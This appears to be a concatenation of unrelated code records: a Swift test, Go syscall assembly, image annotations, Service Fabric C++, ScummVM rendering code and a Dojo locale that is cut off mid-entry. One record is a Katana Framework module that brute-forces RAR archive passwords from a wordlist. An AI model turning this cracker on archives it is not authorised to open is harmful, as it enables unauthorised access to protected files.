%target-typecheck-verify-swift\n\nlet x: Bool = 3/4 as Float > 1/2 as Float\n\nfunc testInIf(a: Any) {\n if a as? Float {} // expected-error {{cannot be used as a boolean}} {{6-6=((}} {{17-17=) != nil)}}\n let _: Float = a as? Float // expected-error {{value of optional type 'Float?' must be unwrapped}}\n // expected-note@-1{{coalesce}}\n // expected-note@-2{{force-unwrap}}\n}\n"} {"text": "// Copyright 2009 The Go Authors. All rights reserved.\n// Use of this source code is governed by a BSD-style\n// license that can be found in the LICENSE file.\n\n// +build !gccgo\n\n#include \"textflag.h\"\n\n//\n// System call support for 386, FreeBSD\n//\n\n// Just jump to package syscall's implementation for all these functions.\n// The runtime may know about them.\n\nTEXT\t·Syscall(SB),NOSPLIT,$0-28\n\tJMP\tsyscall·Syscall(SB)\n\nTEXT\t·Syscall6(SB),NOSPLIT,$0-40\n\tJMP\tsyscall·Syscall6(SB)\n\nTEXT\t·Syscall9(SB),NOSPLIT,$0-52\n\tJMP\tsyscall·Syscall9(SB)\n\nTEXT ·RawSyscall(SB),NOSPLIT,$0-28\n\tJMP\tsyscall·RawSyscall(SB)\n\nTEXT\t·RawSyscall6(SB),NOSPLIT,$0-40\n\tJMP\tsyscall·RawSyscall6(SB)\n"} {"text": "\n\timagesRaw\n\t2017-12-19 12:52:23.942753.jpg\n\t/Users/abell/Development/other.nyc/Camera/imagesRaw/2017-12-19 12:52:23.942753.jpg\n\t\n\t\tUnknown\n\t\n\t\n\t\t352\n\t\t240\n\t\t3\n\t\n\t0\n\t\n\t\tbus\n\t\tUnspecified\n\t\t1\n\t\t0\n\t\t\n\t\t\t1\n\t\t\t149\n\t\t\t108\n\t\t\t234\n\t\t\n\t\n\t\n\t\ttruck\n\t\tUnspecified\n\t\t0\n\t\t0\n\t\t\n\t\t\t163\n\t\t\t123\n\t\t\t180\n\t\t\t141\n\t\t\n\t\n\t\n\t\tcar\n\t\tUnspecified\n\t\t0\n\t\t0\n\t\t\n\t\t\t112\n\t\t\t146\n\t\t\t133\n\t\t\t161\n\t\t\n\t\n\t\n\t\tcar\n\t\tUnspecified\n\t\t0\n\t\t0\n\t\t\n\t\t\t128\n\t\t\t136\n\t\t\t144\n\t\t\t149\n\t\t\n\t\n\t\n\t\tcar\n\t\tUnspecified\n\t\t0\n\t\t0\n\t\t\n\t\t\t148\n\t\t\t135\n\t\t\t160\n\t\t\t144\n\t\t\n\t\n\t\n\t\tcar\n\t\tUnspecified\n\t\t0\n\t\t0\n\t\t\n\t\t\t150\n\t\t\t142\n\t\t\t166\n\t\t\t153\n\t\t\n\t\n\t\n\t\tcar\n\t\tUnspecified\n\t\t0\n\t\t0\n\t\t\n\t\t\t175\n\t\t\t138\n\t\t\t189\n\t\t\t148\n\t\t\n\t\n\t\n\t\tcar\n\t\tUnspecified\n\t\t0\n\t\t0\n\t\t\n\t\t\t199\n\t\t\t147\n\t\t\t220\n\t\t\t162\n\t\t\n\t\n\n"} {"text": "// ------------------------------------------------------------\n// Copyright (c) Microsoft Corporation. All rights reserved.\n// Licensed under the MIT License (MIT). See License.txt in the repo root for license information.\n// ------------------------------------------------------------\n\n#include \"Ra.Stdafx.h\"\n\nusing namespace std;\nusing namespace Common;\nusing namespace Reliability;\nusing namespace ReconfigurationAgentComponent;\nusing namespace ReplicationComponent;\nusing namespace ServiceModel;\n\nnamespace\n{\n StringLiteral const ReadStatusTag(\"read\");\n StringLiteral const WriteStatusTag(\"write\");\n}\n\nComStatefulServicePartition::ComStatefulServicePartition(\n Common::Guid const & partitionId, \n FABRIC_REPLICA_ID replicaId, \n ConsistencyUnitDescription const & consistencyUnitDescription, \n bool hasPersistedState,\n std::weak_ptr && failoverUnitProxyWPtr)\n : ComServicePartitionBase(std::move(failoverUnitProxyWPtr)),\n replicaId_(replicaId),\n isServiceOpened_(false),\n createReplicatorAlreadyCalled_(false),\n partitionInfo_(partitionId, consistencyUnitDescription),\n hasPersistedState_(hasPersistedState),\n partitionId_(partitionId)\n{\n}\n\nvoid ComStatefulServicePartition::ClosePartition()\n{\n AcquireWriteLock grab(lock_);\n\n if(!isValidPartition_)\n {\n Assert::CodingError(\"ComStatefulServicePartition duplicate close call.\");\n }\n\n isValidPartition_ = false;\n}\n\nvoid ComStatefulServicePartition::AssertIsValid(Common::Guid const & partitionId, FABRIC_REPLICA_ID replicaId, FailoverUnitProxy const & owner) const\n{\n AcquireReadLock grab(lock_);\n ASSERT_IF(partitionId_ != partitionId, \"PartitionId is invalid {0}\", owner);\n ASSERT_IF(replicaId_ != replicaId, \"ReplicaId is invalid {0}\", owner);\n ASSERT_IF(!isValidPartition_, \"Partition is closed {0}\", owner);\n}\n\nHRESULT ComStatefulServicePartition::GetPartitionInfo(FABRIC_SERVICE_PARTITION_INFORMATION const **bufferedValue)\n{\n if (!bufferedValue)\n {\n return ComUtility::OnPublicApiReturn(E_POINTER);\n }\n\n auto error = CheckIfOpen();\n if (!error.IsSuccess())\n {\n return ComUtility::OnPublicApiReturn(error);\n }\n\n *bufferedValue = partitionInfo_.Value;\n\n return ComUtility::OnPublicApiReturn(S_OK);\n}\n\nHRESULT ComStatefulServicePartition::GetStatus(\n AccessStatusType::Enum type,\n FABRIC_SERVICE_PARTITION_ACCESS_STATUS * valueOut)\n{\n if (!valueOut)\n {\n return ComUtility::OnPublicApiReturn(E_POINTER);\n }\n\n auto error = ErrorCode::Success();\n AccessStatus::Enum accessStatus = AccessStatus::NotPrimary;\n\n {\n AcquireReadLock grab(lock_);\n error = CheckIfOpen(grab);\n if (!error.IsSuccess())\n {\n return ComUtility::OnPublicApiReturn(error);\n }\n\n // Read the value from the partition under the lock\n error = readWriteStatus_.TryGet(type, accessStatus);\n if (!error.IsSuccess())\n {\n return ComUtility::OnPublicApiReturn(error);\n }\n }\n \n if (accessStatus != AccessStatus::NotPrimary)\n {\n FailoverUnitProxySPtr failoverUnitProxy;\n error = LockFailoverUnitProxy(failoverUnitProxy);\n if (!error.IsSuccess())\n {\n return ComUtility::OnPublicApiReturn(error);\n }\n\n if (failoverUnitProxy->ApplicationHostObj.IsLeaseExpired())\n {\n /*\n This returns whether the lease has expired and not whether the lease has failed\n\n If the lease has expired then the node goes into arbitration. At this time the read/write status must be TRY_AGAIN (unless already not primary).\n\n If the node wins arbitration then the lease is no longer expired and the value will be whatever failover determines\n\n If the node loses arbitration it will go down. In the future we can add an optimization where during the time the node is going down we return NOT_PRIMARY\n */\n auto original = accessStatus;\n accessStatus = AccessStatus::TryAgain;\n\n RAPEventSource::Events->SFPartitionLeaseExpiredStatus(type == AccessStatusType::Read ? ReadStatusTag : WriteStatusTag, accessStatus, original);\n }\n }\n\n *valueOut = AccessStatus::ConvertToPublicAccessStatus(accessStatus);\n\n return ComUtility::OnPublicApiReturn(error);\n}\n\nHRESULT ComStatefulServicePartition::GetReadStatus(::FABRIC_SERVICE_PARTITION_ACCESS_STATUS *readStatus)\n{\n auto hr = GetStatus(AccessStatusType::Read, readStatus);\n\n ASSERT_IF(SUCCEEDED(hr) && *readStatus == FABRIC_SERVICE_PARTITION_ACCESS_STATUS_INVALID, \"Cannot return invalid read status\");\n return hr;\n}\n\nHRESULT ComStatefulServicePartition::GetWriteStatus(::FABRIC_SERVICE_PARTITION_ACCESS_STATUS *writeStatus)\n{\n auto hr = GetStatus(AccessStatusType::Write, writeStatus);\n\n ASSERT_IF(SUCCEEDED(hr) && *writeStatus == FABRIC_SERVICE_PARTITION_ACCESS_STATUS_INVALID, \"Cannot return invalid write status\");\n return hr;\n}\n\nErrorCode ComStatefulServicePartition::Test_IsLeaseExpired(bool & isLeaseExpired)\n{\n FailoverUnitProxySPtr failoverUnitProxy;\n auto error = LockFailoverUnitProxy(failoverUnitProxy);\n if (!error.IsSuccess())\n {\n return error;\n }\n\n isLeaseExpired = failoverUnitProxy->ApplicationHostObj.IsLeaseExpired();\n return error;\n}\n\nHRESULT ComStatefulServicePartition::CreateReplicator(\n __in ::IFabricStateProvider *stateProvider,\n __in_opt ::FABRIC_REPLICATOR_SETTINGS const *replicatorSettings,\n __out ::IFabricReplicator **replicator,\n __out ::IFabricStateReplicator **stateReplicator)\n{ \n FailoverUnitProxySPtr failoverUnitProxySPtr;\n HRESULT hr = PrepareToCreateReplicator(failoverUnitProxySPtr);\n\n if (!SUCCEEDED(hr))\n {\n return ComUtility::OnPublicApiReturn(hr);\n }\n\n ASSERT_IFNOT(failoverUnitProxySPtr, \"FailoverUnit proxy should be valid\");\n FailoverUnitProxySPtr forReplicator = failoverUnitProxySPtr;\n Common::ComPointer<::IFabricStateReplicator> localReplicator;\n \n hr = failoverUnitProxySPtr->ReplicatorFactory.CreateReplicator(\n replicaId_, \n this, \n stateProvider, \n replicatorSettings,\n hasPersistedState_,\n move(forReplicator),\n localReplicator.InitializationAddress());\n\n if(FAILED(hr))\n {\n RAPEventSource::Events->SFPartitionFailedToCreateReplicator(\n static_cast<_int64>(replicaId_),\n hr);\n return ComUtility::OnPublicApiReturn(hr);\n }\n\n hr = localReplicator->QueryInterface(::IID_IFabricReplicator, (LPVOID*) replicator);\n ASSERT_IFNOT(SUCCEEDED(hr), \"Built-in replicator failed a QI for IFabricReplicator.\");\n \n hr = localReplicator->QueryInterface(::IID_IFabricStateReplicator, (LPVOID*) stateReplicator);;\n ASSERT_IFNOT(SUCCEEDED(hr), \"Built-in replicator failed a QI for IFabricStateReplicator.\");\n\n return ComUtility::OnPublicApiReturn(S_OK);\n}\n\nHRESULT ComStatefulServicePartition::ReportLoad(ULONG metricCount, FABRIC_LOAD_METRIC const *metrics)\n{\n return ComServicePartitionBase::ReportLoad(metricCount, metrics);\n}\n\nHRESULT ComStatefulServicePartition::ReportFault(FABRIC_FAULT_TYPE faultType)\n{\n if (\n faultType != FABRIC_FAULT_TYPE_PERMANENT &&\n faultType != FABRIC_FAULT_TYPE_TRANSIENT)\n {\n return ComUtility::OnPublicApiReturn(ErrorCode(ErrorCodeValue::InvalidArgument));\n }\n\n FailoverUnitProxySPtr failoverUnitProxySPtr;\n auto error = CheckIfOpenAndLockFailoverUnitProxy(failoverUnitProxySPtr);\n if (!error.IsSuccess())\n {\n return ComUtility::OnPublicApiReturn(error);\n }\n\n error = failoverUnitProxySPtr->ReportFault(FaultType::FromPublicAPI(faultType));\n return ComUtility::OnPublicApiReturn(error);\n}\n\nHRESULT ComStatefulServicePartition::ReportReplicaHealth(FABRIC_HEALTH_INFORMATION const *healthInformation)\n{\n return ReportReplicaHealth2(healthInformation, nullptr);\n}\n\nHRESULT ComStatefulServicePartition::ReportReplicaHealth2(\n FABRIC_HEALTH_INFORMATION const *healthInformation,\n FABRIC_HEALTH_REPORT_SEND_OPTIONS const *sendOptions)\n{\n if (!healthInformation)\n {\n return ComUtility::OnPublicApiReturn(E_POINTER);\n }\n\n HealthInformation healthInfoObj;\n auto error = healthInfoObj.FromCommonPublicApi(*healthInformation);\n if (!error.IsSuccess())\n {\n return ComUtility::OnPublicApiReturn(move(error));\n }\n\n HealthReportSendOptionsUPtr sendOptionsObj;\n if (sendOptions != nullptr)\n {\n sendOptionsObj = make_unique();\n error = sendOptionsObj->FromPublicApi(*sendOptions);\n if (!error.IsSuccess())\n {\n return ComUtility::OnPublicApiReturn(move(error));\n }\n }\n\n {\n AcquireReadLock grab(lock_);\n if (!isValidPartition_)\n {\n return ComUtility::OnPublicApiReturn(ErrorCode(ErrorCodeValue::ObjectClosed));\n }\n }\n\n auto healthReport = ServiceModel::HealthReport::GenerateReplicaHealthReport(move(healthInfoObj), partitionId_, replicaId_);\n \n FailoverUnitProxySPtr failoverUnitProxySPtr = failoverUnitProxyWPtr_.lock();\n if (failoverUnitProxySPtr)\n {\n error = failoverUnitProxySPtr->ReportHealth(move(healthReport), move(sendOptionsObj));\n return ComUtility::OnPublicApiReturn(move(error));\n }\n\n return ComUtility::OnPublicApiReturn(FABRIC_E_COMMUNICATION_ERROR);\n}\n\nHRESULT ComStatefulServicePartition::ReportPartitionHealth(FABRIC_HEALTH_INFORMATION const *healthInformation)\n{\n return ReportPartitionHealth2(healthInformation, nullptr);\n}\n\nHRESULT ComStatefulServicePartition::ReportPartitionHealth2(\n FABRIC_HEALTH_INFORMATION const *healthInformation,\n FABRIC_HEALTH_REPORT_SEND_OPTIONS const *sendOptions)\n{\n if (!healthInformation)\n {\n return ComUtility::OnPublicApiReturn(E_POINTER);\n }\n\n HealthInformation healthInfoObj;\n auto error = healthInfoObj.FromCommonPublicApi(*healthInformation);\n if (!error.IsSuccess())\n {\n return ComUtility::OnPublicApiReturn(move(error));\n }\n\n HealthReportSendOptionsUPtr sendOptionsObj;\n if (sendOptions != nullptr)\n {\n sendOptionsObj = make_unique();\n error = sendOptionsObj->FromPublicApi(*sendOptions);\n if (!error.IsSuccess())\n {\n return ComUtility::OnPublicApiReturn(move(error));\n }\n }\n\n {\n AcquireReadLock grab(lock_);\n if (!isValidPartition_)\n {\n return ComUtility::OnPublicApiReturn(ErrorCode(ErrorCodeValue::ObjectClosed));\n }\n }\n\n auto healthReport = ServiceModel::HealthReport::GeneratePartitionHealthReport(move(healthInfoObj), partitionId_);\n \n FailoverUnitProxySPtr failoverUnitProxySPtr = failoverUnitProxyWPtr_.lock();\n if (failoverUnitProxySPtr)\n {\n error = failoverUnitProxySPtr->ReportHealth(move(healthReport), move(sendOptionsObj));\n return ComUtility::OnPublicApiReturn(move(error));\n }\n\n return ComUtility::OnPublicApiReturn(FABRIC_E_COMMUNICATION_ERROR);\n}\n\nHRESULT ComStatefulServicePartition::ReportMoveCost(FABRIC_MOVE_COST moveCost)\n{\n FailoverUnitProxySPtr failoverUnitProxySPtr;\n auto error = CheckIfOpenAndLockFailoverUnitProxy(failoverUnitProxySPtr);\n if (!error.IsSuccess())\n {\n return ComUtility::OnPublicApiReturn(error);\n }\n \n vector loadMetrics;\n std::wstring moveCostMetricName(*LoadBalancingComponent::Constants::MoveCostMetricName);\n loadMetrics.push_back(LoadBalancingComponent::LoadMetric(move(moveCostMetricName), moveCost));\n\n error = failoverUnitProxySPtr->ReportLoad(move(loadMetrics));\n return ComUtility::OnPublicApiReturn(error);\n}\n\nHRESULT ComStatefulServicePartition::CreateTransactionalReplicator(\n __in ::IFabricStateProvider2Factory * factory,\n __in ::IFabricDataLossHandler * dataLossHandler,\n __in_opt ::FABRIC_REPLICATOR_SETTINGS const *replicatorSettings,\n __in_opt ::TRANSACTIONAL_REPLICATOR_SETTINGS const * transactionalReplicatorSettings,\n __in_opt KTLLOGGER_SHARED_LOG_SETTINGS const * ktlloggerSharedSettings,\n __out ::IFabricPrimaryReplicator ** primaryReplicator,\n __out void ** transactionalReplicator)\n{\n FailoverUnitProxySPtr failoverUnitProxySPtr;\n Common::ComPointer activationContext;\n\n HRESULT hr = PrepareToCreateReplicator(failoverUnitProxySPtr);\n\n if (!SUCCEEDED(hr))\n {\n return ComUtility::OnPublicApiReturn(hr);\n }\n\n ASSERT_IFNOT(failoverUnitProxySPtr, \"FailoverUnit proxy should be valid\");\n\n ErrorCode error = failoverUnitProxySPtr->ApplicationHostObj.GetCodePackageActivationContext(\n failoverUnitProxySPtr->RuntimeId,\n activationContext);\n\n if (!error.IsSuccess())\n {\n return ComUtility::OnPublicApiReturn(error);\n }\n\n FailoverUnitProxySPtr forReplicator = failoverUnitProxySPtr;\n\n hr = failoverUnitProxySPtr->TransactionalReplicatorFactory.CreateReplicator(\n replicaId_, \n failoverUnitProxySPtr->ReplicatorFactory,\n this, \n replicatorSettings,\n transactionalReplicatorSettings,\n ktlloggerSharedSettings,\n *activationContext.GetRawPointer(),\n hasPersistedState_,\n move(forReplicator),\n factory,\n dataLossHandler,\n primaryReplicator,\n (PHANDLE)transactionalReplicator);\n\n if (FAILED(hr))\n {\n RAPEventSource::Events->SFPartitionFailedToCreateReplicator(\n static_cast<_int64>(replicaId_),\n hr);\n }\n\n return ComUtility::OnPublicApiReturn(hr);\n}\n\nHRESULT ComStatefulServicePartition::CreateTransactionalReplicatorInternal(\n __in ::IFabricTransactionalReplicatorRuntimeConfigurations * runtimeConfigurations,\n __in ::IFabricStateProvider2Factory * factory,\n __in ::IFabricDataLossHandler * dataLossHandler,\n __in_opt ::FABRIC_REPLICATOR_SETTINGS const *replicatorSettings,\n __in_opt ::TRANSACTIONAL_REPLICATOR_SETTINGS const * transactionalReplicatorSettings,\n __in_opt KTLLOGGER_SHARED_LOG_SETTINGS const * ktlloggerSharedSettings, \n __out ::IFabricPrimaryReplicator ** primaryReplicator,\n __out void ** transactionalReplicator)\n{\n if (!runtimeConfigurations)\n {\n return ComUtility::OnPublicApiReturn(E_POINTER);\n }\n\n FailoverUnitProxySPtr failoverUnitProxySPtr;\n HRESULT hr = PrepareToCreateReplicator(failoverUnitProxySPtr);\n\n if (!SUCCEEDED(hr))\n {\n return ComUtility::OnPublicApiReturn(hr);\n }\n\n FailoverUnitProxySPtr forReplicator = failoverUnitProxySPtr;\n\n hr = failoverUnitProxySPtr->TransactionalReplicatorFactory.CreateReplicator(\n replicaId_, \n failoverUnitProxySPtr->ReplicatorFactory,\n this, \n replicatorSettings,\n transactionalReplicatorSettings,\n ktlloggerSharedSettings,\n runtimeConfigurations,\n hasPersistedState_,\n move(forReplicator),\n factory,\n dataLossHandler,\n primaryReplicator,\n (PHANDLE)transactionalReplicator);\n\n if (FAILED(hr))\n {\n RAPEventSource::Events->SFPartitionFailedToCreateReplicator(\n static_cast<_int64>(replicaId_),\n hr);\n }\n\n return ComUtility::OnPublicApiReturn(hr);\n}\n\nHRESULT ComStatefulServicePartition::GetKtlSystem(\n __out void** ktlSystem)\n{\n FailoverUnitProxySPtr failoverUnitProxySPtr = failoverUnitProxyWPtr_.lock();\n if (!failoverUnitProxySPtr)\n {\n RAPEventSource::Events->SFPartitionCouldNotGetFUP(static_cast<_int64>(replicaId_));\n return ComUtility::OnPublicApiReturn(ErrorCode(ErrorCodeValue::ObjectClosed));\n }\n\n KtlSystem * ktlSystemPtr = nullptr;\n ErrorCode error = failoverUnitProxySPtr->ApplicationHostObj.GetKtlSystem(&ktlSystemPtr);\n if (!error.IsSuccess())\n {\n return ComUtility::OnPublicApiReturn(error);\n }\n \n *ktlSystem = ktlSystemPtr;\n return ComUtility::OnPublicApiReturn(error);\n}\n\nvoid ComStatefulServicePartition::SetReadWriteStatus(ReadWriteStatusValue && value)\n{\n AcquireWriteLock grab(lock_);\n readWriteStatus_ = move(value);\n}\n\nvoid ComStatefulServicePartition::OnServiceOpened()\n{\n AcquireWriteLock grab(lock_);\n \n isServiceOpened_ = true;\n}\n\nFABRIC_SERVICE_PARTITION_ACCESS_STATUS ComStatefulServicePartition::GetReadStatusForQuery() \n{\n FABRIC_SERVICE_PARTITION_ACCESS_STATUS rv = FABRIC_SERVICE_PARTITION_ACCESS_STATUS_INVALID;\n HRESULT hr = GetReadStatus(&rv);\n if (FAILED(hr))\n {\n return FABRIC_SERVICE_PARTITION_ACCESS_STATUS_INVALID;\n }\n\n return rv;\n}\n\nFABRIC_SERVICE_PARTITION_ACCESS_STATUS ComStatefulServicePartition::GetWriteStatusForQuery() \n{\n FABRIC_SERVICE_PARTITION_ACCESS_STATUS rv = FABRIC_SERVICE_PARTITION_ACCESS_STATUS_INVALID;\n HRESULT hr = GetWriteStatus(&rv);\n if (FAILED(hr))\n {\n return FABRIC_SERVICE_PARTITION_ACCESS_STATUS_INVALID;\n }\n\n return rv;\n}\n\nHRESULT ComStatefulServicePartition::PrepareToCreateReplicator(__out FailoverUnitProxySPtr & failoverUnitProxySPtr)\n{\n RAPEventSource::Events->SFPartitionCreatingReplicator(static_cast<_int64>(replicaId_));\n AcquireWriteLock grab(lock_);\n\n if (!isValidPartition_)\n {\n RAPEventSource::Events->SFPartitionInvalidReplica(static_cast<_int64>(replicaId_));\n return ErrorCode(ErrorCodeValue::ObjectClosed).ToHResult();\n }\n\n if (createReplicatorAlreadyCalled_ || isServiceOpened_)\n {\n RAPEventSource::Events->SFPartitionReplicaAlreadyOpen(\n static_cast<_int64>(replicaId_),\n isServiceOpened_,\n createReplicatorAlreadyCalled_);\n return ErrorCode(ErrorCodeValue::InvalidState).ToHResult();\n }\n\n createReplicatorAlreadyCalled_ = true;\n\n failoverUnitProxySPtr = failoverUnitProxyWPtr_.lock();\n\n if (!failoverUnitProxySPtr)\n {\n RAPEventSource::Events->SFPartitionCouldNotGetFUP(static_cast<_int64>(replicaId_));\n return ErrorCode(ErrorCodeValue::ObjectClosed).ToHResult();\n }\n\n return S_OK;\n}\n"} {"text": "{\n \"requireRemap\": [\n {\n \"from\": \"./index.marko\",\n \"to\": \"./index[ds-4].marko\",\n \"if-flag\": \"ds-4\"\n }\n ]\n}\n"} {"text": "/* ScummVM - Graphic Adventure Engine\n *\n * ScummVM is the legal property of its developers, whose names\n * are too numerous to list here. Please refer to the COPYRIGHT\n * file distributed with this source distribution.\n *\n * This program is free software; you can redistribute it and/or\n * modify it under the terms of the GNU General Public License\n * as published by the Free Software Foundation; either version 2\n * of the License, or (at your option) any later version.\n *\n * This program is distributed in the hope that it will be useful,\n * but WITHOUT ANY WARRANTY; without even the implied warranty of\n * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n * GNU General Public License for more details.\n *\n * You should have received a copy of the GNU General Public License\n * along with this program; if not, write to the Free Software\n * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n *\n */\n\n#include \"bladerunner/set_effects.h\"\n\nnamespace BladeRunner {\n\nSetEffects::SetEffects(BladeRunnerEngine *vm) {\n\t_vm = vm;\n\n\t_distanceColor.r = 1.0f;\n\t_distanceColor.g = 1.0f;\n\t_distanceColor.b = 1.0f;\n\t_distanceCoeficient = 0.1f;\n\n\t_fadeColor.r = 0.0f;\n\t_fadeColor.g = 0.0f;\n\t_fadeColor.b = 0.0f;\n\t_fadeDensity = 0.0f;\n\n\t_fogCount = 0;\n\t_fogs = nullptr;\n}\n\nSetEffects::~SetEffects() {\n\treset();\n}\n\nvoid SetEffects::read(Common::ReadStream *stream, int frameCount) {\n\t_distanceCoeficient = stream->readFloatLE();\n\t_distanceColor.r = stream->readFloatLE();\n\t_distanceColor.g = stream->readFloatLE();\n\t_distanceColor.b = stream->readFloatLE();\n\n\t_fogCount = stream->readUint32LE();\n\tint i;\n\tfor (i = 0; i < _fogCount; ++i) {\n\t\tint type = stream->readUint32LE();\n\t\tFog *fog = nullptr;\n\t\tswitch (type) {\n\t\tcase 0:\n\t\t\tfog = new FogSphere();\n\t\t\tbreak;\n\t\tcase 1:\n\t\t\tfog = new FogCone();\n\t\t\tbreak;\n\t\tcase 2:\n\t\t\tfog = new FogBox();\n\t\t\tbreak;\n\t\tdefault:\n\t\t\terror(\"Unknown fog type %d\", type);\n\t\t}\n\t\tif (fog != nullptr) {\n\t\t\tfog->read(stream, frameCount);\n\t\t\tfog->_next = _fogs;\n\t\t\t_fogs = fog;\n\t\t}\n\t}\n}\n\nvoid SetEffects::reset() {\n\tFog *nextFog;\n\n\tif (!_fogs) {\n\t\treturn;\n\t}\n\n\tdo {\n\t\tnextFog = _fogs->_next;\n\t\tdelete _fogs;\n\t\t_fogs = nextFog;\n\t} while (nextFog);\n}\n\nvoid SetEffects::setupFrame(int frame) {\n\tfor (Fog *fog = _fogs; fog != nullptr; fog = fog->_next) {\n\t\tfog->setupFrame(frame);\n\t}\n}\n\nvoid SetEffects::setFadeColor(float r, float g, float b) {\n\t_fadeColor.r = r;\n\t_fadeColor.g = g;\n\t_fadeColor.b = b;\n}\n\nvoid SetEffects::setFadeDensity(float density) {\n\t_fadeDensity = density;\n}\n\n/**\n* Set fog color for fog effect named fogName.\n* RGB arguments are percentages of red, green and blue\n*/\nvoid SetEffects::setFogColor(const Common::String &fogName, float r, float g, float b) {\n\tFog *fog = findFog(fogName);\n\tif (fog == nullptr) {\n\t\treturn;\n\t}\n\n\tfog->_fogColor.r = r;\n\tfog->_fogColor.g = g;\n\tfog->_fogColor.b = b;\n}\n\nvoid SetEffects::setFogDensity(const Common::String &fogName, float density) {\n\tFog *fog = findFog(fogName);\n\tif (fog == nullptr) {\n\t\treturn;\n\t}\n\n\tfog->_fogDensity = density;\n}\n\nvoid SetEffects::calculateColor(Vector3 viewPosition, Vector3 position, float *outCoeficient, Color *outColor) const {\n\tfloat distanceCoeficient = CLIP((position - viewPosition).length() * _distanceCoeficient, 0.0f, 1.0f);\n\n\t*outCoeficient = 1.0f - distanceCoeficient;\n\toutColor->r = _distanceColor.r * distanceCoeficient;\n\toutColor->g = _distanceColor.g * distanceCoeficient;\n\toutColor->b = _distanceColor.b * distanceCoeficient;\n\n\tfor (Fog *fog = _fogs; fog != nullptr; fog = fog->_next) {\n\t\tfloat fogCoeficient = 0.0f;\n\t\tfog->calculateCoeficient(position, viewPosition, &fogCoeficient);\n\t\tif (fogCoeficient > 0.0f) {\n\t\t\tfogCoeficient = CLIP(fog->_fogDensity * fogCoeficient, 0.0f, 1.0f);\n\n\t\t\t*outCoeficient = *outCoeficient * (1.0f - fogCoeficient);\n\t\t\toutColor->r = outColor->r * (1.0f - fogCoeficient) + fog->_fogColor.r * fogCoeficient;\n\t\t\toutColor->g = outColor->g * (1.0f - fogCoeficient) + fog->_fogColor.g * fogCoeficient;\n\t\t\toutColor->b = outColor->b * (1.0f - fogCoeficient) + fog->_fogColor.b * fogCoeficient;\n\t\t}\n\t}\n\n\t*outCoeficient = *outCoeficient * (1.0f - _fadeDensity);\n\toutColor->r = outColor->r * (1.0f - _fadeDensity) + _fadeColor.r * _fadeDensity;\n\toutColor->g = outColor->g * (1.0f - _fadeDensity) + _fadeColor.g * _fadeDensity;\n\toutColor->b = outColor->b * (1.0f - _fadeDensity) + _fadeColor.b * _fadeDensity;\n}\n\nFog *SetEffects::findFog(const Common::String &fogName) const {\n\tif (!_fogs) {\n\t\treturn nullptr;\n\t}\n\n\tFog *fog = _fogs;\n\n\twhile (fog != nullptr) {\n\t\tif (fogName.compareTo(fog->_name) == 0) {\n\t\t\tbreak;\n\t\t}\n\t\tfog = fog->_next;\n\t}\n\n\treturn fog;\n}\n\n} // End of namespace BladeRunner\n"} {"text": "# This module requires katana framework \n# https://github.com/PowerScript/KatanaFramework\n\n# :-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-: #\n# Katana Core import #\nfrom core.KatanaFramework import * #\n# :-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-: #\n\n# LIBRARIES\nfrom lib.rarfile.RARfile import *\n# END LIBRARIES \n\n# INFORMATION MODULE\ndef init():\n\tinit.Author =\"LeSZO ZerO\"\n\tinit.Version =\"2.0\"\n\tinit.Description =\"Brute Force to RAR file.\"\n\tinit.CodeName =\"fle/bt.rar\"\n\tinit.DateCreation =\"28/02/2015\" \n\tinit.LastModification =\"01/06/2016\"\n\tinit.References =None\n\tinit.License =KTF_LINCENSE\n\tinit.var ={}\n\n\t# DEFAULT OPTIONS MODULE\n\tinit.options = {\n\t\t# NAME VALUE RQ DESCRIPTION\n\t\t'file':[\"files/test/test.rar\",True ,'RAR file to Crack'],\n\t\t'dict':[DITIONARY_PASSWORDS ,False,'Wordlist']\n\t}\n\treturn init\n# END INFORMATION MODULE\n\n# CODE MODULE ############################################################################################\ndef main(run):\n\tLoadingfile(init.var['dict'])\n\tArch = open(init.var['dict'],\"r\")\n\tleeArchivo = Arch.readlines()\n\tRARarch = RarFile(init.var['file'])\n\tfor palabra in leeArchivo:\n\t\tpalabraLlegada = palabra.split(\"\\n\")\n\t\ttry:\n\t\t\tRARarch.extractall(pwd=str(palabraLlegada[0]),path=\"/root/home/\")\n\t\t\tprintk.suff(\"Successfully with [\"+palabraLlegada[0]+\"] -> /root/home/\")\n\t\t\tUTIL.sRegister(init,palabraLlegada[0])\n\t\t\treturn\n\t\texcept:printk.inf(\" | Checking '\"+palabraLlegada[0]+\"'\")\n\n# END CODE MODULE ############################################################################################\n"} {"text": "define(\n//begin v1.x content\n{\n\t\"days-standAlone-short\": [\n\t\t\"日\",\n\t\t\"月\",\n\t\t\"火\",\n\t\t\"水\",\n\t\t\"木\",\n\t\t\"金\",\n\t\t\"土\"\n\t],\n\t\"months-format-narrow\": [\n\t\t\"1\",\n\t\t\"2\",\n\t\t\"3\",\n\t\t\"4\",\n\t\t\"5\",\n\t\t\"6\",\n\t\t\"7\",\n\t\t\"8\",\n\t\t\"9\",\n\t\t\"10\",\n\t\t\"11\",\n\t\t\"12\"\n\t],\n\t\"field-weekday\": \"曜日\",\n\t\"dateFormatItem-GyMMMEd\": \"Gy年M月d日(E)\",\n\t\"dateFormatItem-MMMEd\": \"M月d日(E)\",\n\t\"days-format-short\": [\n\t\t\"日\",\n\t\t\"月\",\n\t\t\"火\",\n\t\t\"水\",\n\t\t\"木\",\n\t\t\"金\",\n\t\t\"土\"\n\t],\n\t\"dateFormat-long\": \"Gy年M月d日\",\n\t\"months-format-wide\": [\n\t\t\"ムハッラム\",\n\t\t\"サフアル\",\n\t\t\"ラビー・ウル・アウワル\",\n\t\t\"ラビー・ウッ・サーニー\",\n\t\t\"ジュマーダル・アウワル\",\n\t\t\"ジュマーダッサーニー\",\n\t\t\"ラジャブ\",\n\t\t\"シャアバーン\",\n\t\t\"ラマダーン\",\n\t\t\"シャウワール\",\n\t\t\"ズル・カイダ\",\n\t\t\"ズル・ヒッジャ\"\n\t],\n\t\"dateFormatItem-yyyyQQQ\": \"Gy/QQQ\",\n\t\"dayPeriods-format-wide-pm\": \"午後\",\n\t\"dateFormat-full\": \"Gy年M月d日EEEE\",\n\t\"dateFormatItem-yyyyMEd\": \"Gy/M/d(E)\",\n\t\"dateFormatItem-Md\": \"M/d\",\n\t\"field-era\": \"時代\",\n\t\"months-standAlone-wide\": 